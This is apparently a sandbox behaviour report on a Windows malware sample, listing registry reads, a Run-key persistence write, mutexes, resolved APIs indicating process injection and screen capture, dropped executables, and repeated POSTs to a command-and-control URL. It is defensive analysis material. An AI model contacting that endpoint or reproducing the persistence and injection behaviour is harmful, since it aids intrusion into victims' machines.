HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles

Write Keys

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x00FD76B72EDDF22127370785\xe3\x8c\xb7
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500

Delete Keys

Nothing to display

Mutexes

Global\CLR_CASOFF_MUTEX
FD76B72EDDF22127370785

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
kernel32.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.IsProcessorFeaturePresent
msvcrt.dll._set_error_mode
msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z
kernel32.dll.FindActCtxSectionStringW
kernel32.dll.GetSystemWindowsDirectoryW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
mscorwks.dll._CorExeMain
mscorwks.dll.GetCLRFunction
advapi32.dll.RegisterTraceGuidsW
advapi32.dll.UnregisterTraceGuids
advapi32.dll.GetTraceLoggerHandle
advapi32.dll.GetTraceEnableLevel
advapi32.dll.GetTraceEnableFlags
advapi32.dll.TraceEvent
mscoree.dll.IEE
mscoreei.dll.IEE
mscorwks.dll.IEE
mscoree.dll.GetStartupFlags
mscoreei.dll.GetStartupFlags
mscoree.dll.GetHostConfigurationFile
mscoreei.dll.GetHostConfigurationFile
mscoreei.dll.GetCORVersion
mscoree.dll.GetCORSystemDirectory
mscoreei.dll.GetCORSystemDirectory_RetAddr
mscoreei.dll.CreateConfigStream
ntdll.dll.RtlUnwind
kernel32.dll.IsWow64Process
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddVectoredContinueHandler
kernel32.dll.RemoveVectoredContinueHandler
advapi32.dll.ConvertSidToStringSidW
shell32.dll.SHGetFolderPathW
kernel32.dll.GetWriteWatch
kernel32.dll.ResetWriteWatch
kernel32.dll.CreateMemoryResourceNotification
kernel32.dll.QueryMemoryResourceNotification
kernel32.dll.QueryActCtxW
kernel32.dll.GetVersionExW
kernel32.dll.GetFullPathNameW
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptImportKey
advapi32.dll.CryptExportKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptVerifySignatureA
advapi32.dll.CryptSignHashA
advapi32.dll.CryptGetProvParam
advapi32.dll.CryptGetUserKey
advapi32.dll.CryptEnumProvidersA
mscoree.dll.GetMetaDataInternalInterface
mscoreei.dll.GetMetaDataInternalInterface
mscorwks.dll.GetMetaDataInternalInterface
mscorjit.dll.getJit
kernel32.dll.VirtualProtect
kernel32.dll.GetUserDefaultUILanguage
kernel32.dll.SetErrorMode
kernel32.dll.GetFileAttributesExW
mscoreei.dll.LoadLibraryShim
culture.dll.ConvertLangIdToCultureName
kernel32.dll.lstrlen
kernel32.dll.lstrlenW
mscoree.dll.ND_RI4
mscoreei.dll.ND_RI4
bcrypt.dll.BCryptGetFipsAlgorithmMode
kernel32.dll.GlobalMemoryStatusEx
kernel32.dll.GetEnvironmentVariableW
kernel32.dll.SwitchToThread
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcessId
advapi32.dll.LookupPrivilegeValueW
kernel32.dll.GetCurrentProcess
advapi32.dll.AdjustTokenPrivileges
kernel32.dll.OpenProcess
psapi.dll.EnumProcessModules
psapi.dll.GetModuleInformation
psapi.dll.GetModuleBaseNameW
psapi.dll.GetModuleFileNameExW
kernel32.dll.GetProcAddress
kernel32.dll.DebugActiveProcess
kernel32.dll.WaitForDebugEvent
kernel32.dll.ContinueDebugEvent
kernel32.dll.DeleteFileA
advapi32.dll.SetKernelObjectSecurity
advapi32.dll.GetKernelObjectSecurity
ntdll.dll.NtSetInformationProcess
ntdll.dll.NtProtectVirtualMemory
kernel32.dll.VirtualAllocEx
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.ResumeThread
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.WriteProcessMemory
kernel32.dll.ReadProcessMemory
kernel32.dll.TerminateProcess
kernel32.dll.CreateProcessW
ole32.dll.CoUninitialize
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
advapi32.dll.EventUnregister
kernel32.dll.LoadLibraryA
kernel32.dll.EnterCriticalSection
kernel32.dll.LeaveCriticalSection
kernel32.dll.LocalAlloc
kernel32.dll.lstrlenA
user32.dll.MessageBoxA
kernel32.dll.GetWindowsDirectoryA
kernel32.dll.WideCharToMultiByte
user32.dll.wsprintfA
kernel32.dll.MultiByteToWideChar
msvcrt.dll.malloc
msvcrt.dll.free
kernel32.dll.CreateRemoteThread
shlwapi.dll.PathRemoveFileSpecA
kernel32.dll.GetModuleFileNameA
shlwapi.dll.PathFindFileNameA
msvcrt.dll.strncmp
msvcrt.dll._strnicmp
kernel32.dll.ExitProcess
shell32.dll.SHGetFolderPathA
kernel32.dll.lstrcpyA
kernel32.dll.lstrcatA
kernel32.dll.CopyFileA
kernel32.dll.GetVolumeInformationA
secur32.dll.GetUserNameExA
advapi32.dll.LookupAccountNameA
advapi32.dll.ConvertSidToStringSidA
kernel32.dll.LocalFree
msvcrt.dll.memcpy
kernel32.dll.lstrcmpA
kernel32.dll.lstrcmpiA
shlwapi.dll.StrStrA
shlwapi.dll.StrStrIA
msvcrt.dll.strtol
msvcrt.dll.realloc
ws2_32.dll.WSAStartup
ws2_32.dll.socket
ws2_32.dll.gethostbyname
ws2_32.dll.htons
ws2_32.dll.connect
ws2_32.dll.send
ws2_32.dll.recv
ws2_32.dll.closesocket
ws2_32.dll.WSACleanup
msvcrt.dll.memset
kernel32.dll.Sleep
ntdll.dll.NtOpenKey
ntdll.dll.NtSetValueKey
ntdll.dll.RtlCreateUserThread
kernel32.dll.CreateProcessA
kernel32.dll.InitializeCriticalSection
kernel32.dll.GetLastError
msvcrt.dll._errno
msvcrt.dll.tolower
msvcrt.dll.isdigit
msvcrt.dll.strtoul
msvcrt.dll.isxdigit
msvcrt.dll.strtod
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.Process32First
kernel32.dll.Process32Next
shlwapi.dll.StrChrA
shlwapi.dll.StrToIntA
kernel32.dll.GetModuleHandleA
version.dll.GetFileVersionInfoSizeA
version.dll.GetFileVersionInfoA
version.dll.VerQueryValueA
msvcrt.dll.memcmp
kernel32.dll.ExpandEnvironmentStringsA
kernel32.dll.GetPrivateProfileSectionNamesA
kernel32.dll.GetPrivateProfileStringA
kernel32.dll.CreateFileA
kernel32.dll.ReadFile
kernel32.dll.WriteFile
advapi32.dll.RegSetValueExA
advapi32.dll.RegOpenKeyExA
kernel32.dll.GetFileSize
kernel32.dll.GetNativeSystemInfo
kernel32.dll.CreateThread
advapi32.dll.GetUserNameW
kernel32.dll.GetComputerNameW
kernel32.dll.GetVersionExA
kernel32.dll.CreateNamedPipeA
kernel32.dll.ConnectNamedPipe
kernel32.dll.DisconnectNamedPipe
wininet.dll.InternetCrackUrlA
kernel32.dll.GetTempPathA
kernel32.dll.GetTempFileNameA
shell32.dll.ShellExecuteA
ws2_32.dll.ioctlsocket
ws2_32.dll.ntohs
kernel32.dll.CreateMutexA
kernel32.dll.ReleaseMutex
ntdll.dll.NtCreateThreadEx
user32.dll.FindWindowA
user32.dll.GetWindowThreadProcessId
kernel32.dll.WaitForSingleObject
user32.dll.EnumWindows
shlwapi.dll.PathFileExistsA
kernel32.dll.CreateDirectoryA
wininet.dll.HttpQueryInfoA
wininet.dll.HttpQueryInfoW
ntdll.dll.RtlCompressBuffer
ntdll.dll.RtlGetCompressionWorkSpaceSize
user32.dll.SetThreadDesktop
user32.dll.CreateDesktopA
user32.dll.OpenDesktopA
kernel32.dll.TerminateThread
user32.dll.PostMessageA
user32.dll.SendMessageA
user32.dll.ChildWindowFromPoint
user32.dll.ScreenToClient
user32.dll.MoveWindow
user32.dll.GetWindowRect
user32.dll.GetMenuItemID
user32.dll.MenuItemFromPoint
user32.dll.RealGetWindowClassA
user32.dll.PtInRect
user32.dll.GetWindowPlacement
user32.dll.GetWindowLongA
user32.dll.SetWindowLongA
user32.dll.WindowFromPoint
shell32.dll.SHAppBarMessage
advapi32.dll.RegQueryValueExA
user32.dll.GetDesktopWindow
gdi32.dll.DeleteDC
user32.dll.ReleaseDC
gdi32.dll.DeleteObject
gdi32.dll.GetDIBits
gdi32.dll.StretchBlt
gdi32.dll.SetStretchBltMode
gdi32.dll.SelectObject
gdi32.dll.CreateCompatibleDC
gdi32.dll.CreateCompatibleBitmap
user32.dll.GetDC
user32.dll.IsWindowVisible
user32.dll.GetWindow
gdi32.dll.BitBlt
user32.dll.PrintWindow
user32.dll.GetTopWindow
ntdll.dll.NtQueryInformationProcess
shell32.dll.SHFileOperationA
kernel32.dll.FindFirstFileA
kernel32.dll.FindNextFileA
sechost.dll.LookupAccountNameLocalA
dnsapi.dll.DnsApiFree

Execute Commands

"C:\Users\Seven01\AppData\Local\Temp\dllhost.exe"
"C:\Users\Seven01\AppData\Roaming\FD76B72EDDF22127370785\FD76B72EDDF22127370785.exe"

Started Services

Nothing to display

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven03b_64 Seven03b_64 VirtualBox 2018-04-27 22:33:08 2018-04-27 22:35:59 171

2 HTTP Request(s) detected

http://45.63.40.19/p3n3l3rk/client.php?FD76B72EDDF22127370785
  • Hostname: 45.63.40.19
  • IP Address:
  • Port: 80
  • Count: 1

POST /p3n3l3rk/client.php?FD76B72EDDF22127370785 HTTP/1.1
Host: 45.63.40.19
Pragma: no-cache
Content-type: text/html
Connection: close

http://45.63.40.19/p3n3l3rk/client.php?FD76B72EDDF22127370785
  • Hostname: 45.63.40.19
  • IP Address:
  • Port: 80
  • Count: 15

